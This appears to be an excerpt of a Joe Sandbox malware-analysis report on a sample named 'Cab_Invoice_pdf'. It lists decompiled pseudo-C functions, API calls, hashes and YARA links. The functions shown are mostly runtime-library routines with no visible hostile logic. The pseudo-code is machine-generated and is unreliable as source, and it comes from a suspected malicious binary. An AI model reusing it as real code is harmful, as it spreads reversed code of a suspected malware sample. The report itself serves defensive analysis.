                            0x0131f2c0
                            0x0131f2c0
                            0x0131f2c6
                            0x0131f2c8
                            0x0131f2cb
                            0x0131f2cb
                            0x0131f2ce
                            0x0131f2d1
                            0x0131f2c0
                            0x0131f2d8
                            0x0131f2b2
                            0x0131f2b2
                            0x0131f2b2
                            0x0131f2dc
                            0x0131f2e2
                            0x0131f2e2
                            0x0131f29d
                            0x0131f2ee
                            0x0131f1c0
                            0x0131f1c0
                            0x0131f212
                            0x0131f212
                            0x0131f217
                            0x0131f22e
                            0x0131f234
                            0x0131f23c
                            0x0131f240
                            0x00000000
                            0x0131f242
                            0x0131f242
                            0x0131f242
                            0x0131f226
                            0x0131f226
                            0x0131f229
                            0x0131f229
                            0x0131f229
                            0x0131f248
                            0x0131f24a
                            0x0131f24b
                            0x0131f259
                            0x0131f259
                            0x0131f1ba

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID: TMP
                            • API String ID: 269201875-3125297090
                            • Opcode ID: ade9bc80a08007bfed3409155f986210b5d08a1c8ae3f0ec314938a2cf51845e
                            • Instruction ID: f3731e3e79587a18801af4c8c17b64d64b0237083e621961140dc6421baf6656
                            • Opcode Fuzzy Hash: ade9bc80a08007bfed3409155f986210b5d08a1c8ae3f0ec314938a2cf51845e
                            • Instruction Fuzzy Hash: 9321F6BE50461A6FE7197E5EAC818BF67ACEE8657C325001AFD049B244DA30DC0A4264
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013127A0, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                            Download Yara Rule
                            C-Code - Quality: 40%
                            			E013127A0(void* __edx, signed int _a8192, char* _a8200) {
				short _v0;
				signed int _t9;
				long _t12;
				signed int _t14;
				void* _t26;
				char* _t28;
				signed int _t32;
				signed int _t33;

				_t26 = __edx;
				E01317880();
				_t9 =  *0x133c008; // 0xa3433343
				_a8192 = _t9 ^ _t32;
				_t28 = _a8200;
				_t12 = GetModuleFileNameW(0,  &_v0, 0x1000);
				_t39 = _t12;
				if(_t12 != 0) {
					_t14 = E01314C90(_t28,  &_v0, 0x1000);
					_t33 = _t32 + 0xc;
					__eflags = _t14;
					if(__eflags != 0) {
						__eflags = _a8192 ^ _t33;
						E0131786A();
						return 1;
					} else {
						_push("Failed to convert executable path to UTF-8.");
						E01311910(__eflags);
						__eflags = _a8192 ^ _t33 + 0x00000004;
						E0131786A();
						return 0;
					}
				} else {
					_push("Failed to get executable path.");
					_push("GetModuleFileNameW");
					E01311860(_t26, _t39);
					E0131786A();
					return 0;
				}
			}











                            0x013127a0
                            0x013127a5
                            0x013127aa
                            0x013127b1
                            0x013127b9
                            0x013127cc
                            0x013127d2
                            0x013127d4
                            0x0131280b
                            0x01312810
                            0x01312813
                            0x01312815
                            0x01312849
                            0x0131284b
                            0x01312856
                            0x01312817
                            0x01312817
                            0x0131281c
                            0x0131282e
                            0x01312830
                            0x0131283b
                            0x0131283b
                            0x013127d6
                            0x013127d6
                            0x013127db
                            0x013127e0
                            0x013127f4
                            0x013127ff
                            0x013127ff

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,013124BA,?,?), ref: 013127CC
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            Strings
                            • Failed to convert executable path to UTF-8., xrefs: 01312817
                            • GetModuleFileNameW, xrefs: 013127DB
                            • Failed to get executable path., xrefs: 013127D6
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorFileLastModuleName
                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                            • API String ID: 2776309574-482168174
                            • Opcode ID: bef26021d22a708a7d6714b7cda39d973027c3753a1536e808d8574d1aafe37f
                            • Instruction ID: a205a57fdbf7f40491a2f4eb9c8ac3401cfe10d7a7d75353fa6430564aee038c
                            • Opcode Fuzzy Hash: bef26021d22a708a7d6714b7cda39d973027c3753a1536e808d8574d1aafe37f
                            • Instruction Fuzzy Hash: 4901D8717103056BF63CA739DC8BBEB76D9AF94708F840429FE09C228AF6649504C69B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01324658, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E01324658(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E0131AFAE(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E0132F230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E0132F230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E01318520(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E0132F230( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E0132F150();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E0132F150();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E0132F150();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E0132495B(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E013187B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0131C9CE();
					_t183 = 0x22;
					 *_t129 = _t183;
					E01321788();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                            0x01324658
                            0x01324663
                            0x0132466a
                            0x0132466c
                            0x0132466c
                            0x0132466e
                            0x01324677
                            0x01324679
                            0x0132467e
                            0x01324684
                            0x0132469a
                            0x0132469f
                            0x013246a2
                            0x013246af
                            0x013246b4
                            0x01324708
                            0x01324710
                            0x01324712
                            0x01324714
                            0x01324717
                            0x01324717
                            0x01324717
                            0x0132471d
                            0x01324725
                            0x01324738
                            0x0132473b
                            0x0132473d
                            0x01324740
                            0x01324741
                            0x01324762
                            0x01324765
                            0x01324765
                            0x01324743
                            0x01324743
                            0x01324745
                            0x01324750
                            0x01324750
                            0x01324752
                            0x01324759
                            0x01324754
                            0x01324754
                            0x01324754
                            0x01324752
                            0x01324766
                            0x01324768
                            0x01324769
                            0x0132476c
                            0x0132476e
                            0x01324778
                            0x01324782
                            0x01324770
                            0x01324770
                            0x01324770
                            0x01324787
                            0x01324787
                            0x0132478c
                            0x0132478f
                            0x0132479a
                            0x0132479a
                            0x0132479a
                            0x0132479a
                            0x0132479e
                            0x013247a5
                            0x013247a6
                            0x013247a9
                            0x013247ac
                            0x013247ac
                            0x013247ae
                            0x00000000
                            0x00000000
                            0x013247c6
                            0x013247cd
                            0x013247d1
                            0x013247d4
                            0x013247d7
                            0x013247d9
                            0x013247d9
                            0x013247d9
                            0x013247db
                            0x013247de
                            0x013247e1
                            0x013247e3
                            0x013247eb
                            0x013247f1
                            0x013247f4
                            0x013247f7
                            0x013247f8
                            0x013247fb
                            0x013247fe
                            0x013247fe
                            0x01324803
                            0x01324806
                            0x00000000
                            0x00000000
                            0x0132481e
                            0x01324823
                            0x01324827
                            0x00000000
                            0x00000000
                            0x0132482b
                            0x0132482e
                            0x0132482f
                            0x0132482f
                            0x01324831
                            0x01324834
                            0x00000000
                            0x00000000
                            0x01324836
                            0x01324839
                            0x01324840
                            0x01324843
                            0x01324846
                            0x0132485c
                            0x0132485c
                            0x0132485c
                            0x01324848
                            0x01324848
                            0x0132484a
                            0x0132484d
                            0x01324858
                            0x0132484f
                            0x01324852
                            0x01324852
                            0x0132484d
                            0x00000000
                            0x01324846
                            0x0132483b
                            0x0132483b
                            0x0132483d
                            0x0132483d
                            0x01324791
                            0x01324791
                            0x01324794
                            0x0132485f
                            0x0132485f
                            0x01324861
                            0x01324863
                            0x01324866
                            0x01324867
                            0x01324868
                            0x01324869
                            0x01324871
                            0x01324871
                            0x01324871
                            0x01324873
                            0x01324876
                            0x01324879
                            0x0132487b
                            0x0132487b
                            0x0132487d
                            0x0132488f
                            0x01324893
                            0x01324896
                            0x0132489d
                            0x013248a5
                            0x013248a5
                            0x013248a8
                            0x013248aa
                            0x013248bb
                            0x013248bb
                            0x013248bf
                            0x013248bf
                            0x013248c2
                            0x013248c4
                            0x013248c7
                            0x00000000
                            0x013248ac
                            0x013248ac
                            0x013248b2
                            0x013248b2
                            0x013248b6
                            0x013248c9
                            0x013248c9
                            0x013248cd
                            0x013248ce
                            0x013248d0
                            0x013248d2
                            0x01324913
                            0x01324913
                            0x01324915
                            0x01324922
                            0x01324922
                            0x01324924
                            0x01324926
                            0x01324927
                            0x01324928
                            0x0132492f
                            0x01324932
                            0x01324934
                            0x01324934
                            0x01324935
                            0x01324937
                            0x0132493a
                            0x0132493a
                            0x0132493c
                            0x0132493e
                            0x00000000
                            0x0132493e
                            0x01324917
                            0x01324919
                            0x00000000
                            0x00000000
                            0x0132491b
                            0x00000000
                            0x00000000
                            0x0132491d
                            0x01324920
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01324920
                            0x013248d9
                            0x013248df
                            0x013248df
                            0x013248e1
                            0x013248e2
                            0x013248e3
                            0x013248e4
                            0x013248eb
                            0x013248ee
                            0x013248f0
                            0x013248f1
                            0x013248f3
                            0x01324900
                            0x01324900
                            0x01324902
                            0x01324904
                            0x01324905
                            0x01324906
                            0x0132490d
                            0x01324910
                            0x01324912
                            0x01324912
                            0x00000000
                            0x01324912
                            0x013248f5
                            0x013248f5
                            0x013248f7
                            0x00000000
                            0x00000000
                            0x013248f9
                            0x00000000
                            0x00000000
                            0x013248fb
                            0x013248fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013248fe
                            0x013248db
                            0x013248dd
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013248dd
                            0x013248ae
                            0x013248b0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013248b0
                            0x013248aa
                            0x00000000
                            0x01324794
                            0x0132478f
                            0x013246b6
                            0x013246b8
                            0x00000000
                            0x013246ba
                            0x013246d0
                            0x013246d5
                            0x013246d7
                            0x013246e3
                            0x013246e9
                            0x013246ea
                            0x013246ec
                            0x013246ee
                            0x013246f9
                            0x013246f9
                            0x013246fc
                            0x013246fe
                            0x013246fe
                            0x01324701
                            0x013246d9
                            0x013246d9
                            0x013246d9
                            0x00000000
                            0x013246d7
                            0x01324686
                            0x01324686
                            0x0132468d
                            0x0132468e
                            0x01324690
                            0x01324942
                            0x01324946
                            0x0132494b
                            0x0132494b
                            0x0132495a
                            0x0132495a

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction ID: 37408c50be862385cf85ac23bfa52516f9be958e5176de40648c675eb74b8eca
                            • Opcode Fuzzy Hash: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction Fuzzy Hash: A3A19A72E103A69FE722EF2CC8907AEBFE5EF52318F18416DD6A59B381C2758941C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131CBFB, Relevance: 6.2, APIs: 4, Instructions: 172pipeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0131CBFB(signed int __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				char _v64;
				void _v72;
				long _v76;
				intOrPtr _v80;
				char _v84;
				void* __ebx;
				signed int _t53;
				intOrPtr _t66;
				signed int _t68;
				int _t70;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				intOrPtr _t98;
				signed int _t104;
				signed int _t109;
				signed int _t111;
				signed int _t118;
				void* _t121;
				intOrPtr* _t128;
				signed int _t130;
				intOrPtr _t140;

				_t118 = __edx;
				_t53 =  *0x133c008; // 0xa3433343
				_v8 = _t53 ^ _t130;
				_t128 = _a16;
				_t121 = _a12;
				_v80 = _a4;
				_v76 = _t121;
				_t104 = GetFileType(_t121) & 0xffff7fff;
				if(_t104 != 1) {
					__eflags = _t104 - 2;
					if(_t104 == 2) {
						L16:
						__eflags = _t104 - 2;
						 *((short*)(_t128 + 6)) = ((0 | _t104 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
						 *((short*)(_t128 + 8)) = 1;
						_t66 = _a8;
						 *((intOrPtr*)(_t128 + 0x10)) = _t66;
						 *_t128 = _t66;
						__eflags = _t104 - 2;
						if(_t104 != 2) {
							_t70 = PeekNamedPipe(_t121, 0, 0, 0,  &_v76, 0);
							__eflags = _t70;
							if(_t70 != 0) {
								 *((intOrPtr*)(_t128 + 0x14)) = _v76;
							}
						}
						_t68 = 1;
						__eflags = 1;
						L20:
						E0131786A();
						return _t68;
					}
					__eflags = _t104 - 3;
					if(_t104 == 3) {
						goto L16;
					}
					__eflags = _t104;
					if(_t104 != 0) {
						L15:
						E0131C998(GetLastError());
						L14:
						_t68 = 0;
						goto L20;
					}
					 *((intOrPtr*)(E0131C9CE())) = 9;
					goto L14;
				}
				 *((short*)(_t128 + 8)) = 1;
				_t74 = _v80;
				if(_v80 == 0) {
					L4:
					_t109 = 0xa;
					memset( &_v48, 0, _t109 << 2);
					if(E013238BB(0, _t140, _v76, 0,  &_v48, 0x28) == 0) {
						goto L15;
					}
					 *((short*)(_t128 + 6)) = E0131CF2D(0, _v16, _v80);
					_t81 = E0131CDB3(_v32, _v28, 0, 0);
					 *(_t128 + 0x20) = _t81;
					 *(_t128 + 0x24) = _t118;
					if((_t81 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t24 = _t128 + 0x20; // 0x83cc758d
					_t83 = E0131CDB3(_v40, _v36,  *_t24, _t118);
					 *(_t128 + 0x18) = _t83;
					 *(_t128 + 0x1c) = _t118;
					if((_t83 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t29 = _t128 + 0x24; // 0xcb830cc4
					_t30 = _t128 + 0x20; // 0x83cc758d
					_t85 = E0131CDB3(_v48, _v44,  *_t30,  *_t29);
					 *(_t128 + 0x28) = _t85;
					 *(_t128 + 0x2c) = _t118;
					_t144 = (_t85 & _t118) - 0xffffffff;
					if((_t85 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t111 = 6;
					memset( &_v72, 0, _t111 << 2);
					if(E013238BB(0, _t144, _v76, 1,  &_v72, 0x18) == 0) {
						goto L15;
					}
					_t39 = _t128 + 0x14; // 0x131cb3d
					_t68 = E0131CEFB( &_v64, _t39) & 0xffffff00 | _t95 != 0x00000000;
					goto L20;
				}
				_v84 = 0;
				if(E0131CF93(_t74,  &_v84) == 0) {
					goto L14;
				}
				_t98 = _v84 - 1;
				_t140 = _t98;
				 *((intOrPtr*)(_t128 + 0x10)) = _t98;
				 *_t128 = _t98;
				goto L4;
			}

































                            0x0131cbfb
                            0x0131cc03
                            0x0131cc0a
                            0x0131cc12
                            0x0131cc16
                            0x0131cc1a
                            0x0131cc1d
                            0x0131cc2a
                            0x0131cc33
                            0x0131cd2e
                            0x0131cd31
                            0x0131cd5a
                            0x0131cd61
                            0x0131cd6c
                            0x0131cd73
                            0x0131cd77
                            0x0131cd7a
                            0x0131cd7d
                            0x0131cd7f
                            0x0131cd82
                            0x0131cd8f
                            0x0131cd95
                            0x0131cd97
                            0x0131cd9c
                            0x0131cd9c
                            0x0131cd97
                            0x0131cda1
                            0x0131cda1
                            0x0131cda2
                            0x0131cdaa
                            0x0131cdb2
                            0x0131cdb2
                            0x0131cd33
                            0x0131cd36
                            0x00000000
                            0x00000000
                            0x0131cd38
                            0x0131cd3a
                            0x0131cd4b
                            0x0131cd52
                            0x0131cd47
                            0x0131cd47
                            0x00000000
                            0x0131cd47
                            0x0131cd41
                            0x00000000
                            0x0131cd41
                            0x0131cc39
                            0x0131cc3f
                            0x0131cc44
                            0x0131cc66
                            0x0131cc68
                            0x0131cc70
                            0x0131cc81
                            0x00000000
                            0x00000000
                            0x0131cc98
                            0x0131cc9f
                            0x0131cca4
                            0x0131ccac
                            0x0131ccb2
                            0x00000000
                            0x00000000
                            0x0131ccb9
                            0x0131ccc2
                            0x0131ccc7
                            0x0131cccf
                            0x0131ccd5
                            0x00000000
                            0x00000000
                            0x0131ccd7
                            0x0131ccda
                            0x0131cce3
                            0x0131cce8
                            0x0131ccf0
                            0x0131ccf3
                            0x0131ccf6
                            0x00000000
                            0x00000000
                            0x0131ccfa
                            0x0131cd00
                            0x0131cd16
                            0x00000000
                            0x00000000
                            0x0131cd18
                            0x0131cd29
                            0x00000000
                            0x0131cd29
                            0x0131cc49
                            0x0131cc57
                            0x00000000
                            0x00000000
                            0x0131cc60
                            0x0131cc60
                            0x0131cc61
                            0x0131cc64
                            0x00000000

                            APIs
                            • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 0131CC20
                              • Part of subcall function 0131CF93: __dosmaperr.LIBCMT ref: 0131CFD6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0131CB29), ref: 0131CD4B
                            • __dosmaperr.LIBCMT ref: 0131CD52
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0131CD8F
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __dosmaperr$ErrorFileLastNamedPeekPipeType
                            • String ID:
                            • API String ID: 3955570002-0
                            • Opcode ID: b1e85e53eaef1843b88b1cf9f4abfb7c4a8f6612d3221f72649e1497fba402f6
                            • Instruction ID: 46df20321cc6f39d98b75af13b7c7b74b6df8965eeb132ea2d0f005ff73c70d5
                            • Opcode Fuzzy Hash: b1e85e53eaef1843b88b1cf9f4abfb7c4a8f6612d3221f72649e1497fba402f6
                            • Instruction Fuzzy Hash: 5B51EF72940609AFDB28DFB8CC40AFEBBF9EF08314B149929E556D66A0E7309945CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132CE51, Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E0132CE51(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E01322807(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E01322807(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E01322807(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E0131C9CE()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E01322807(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
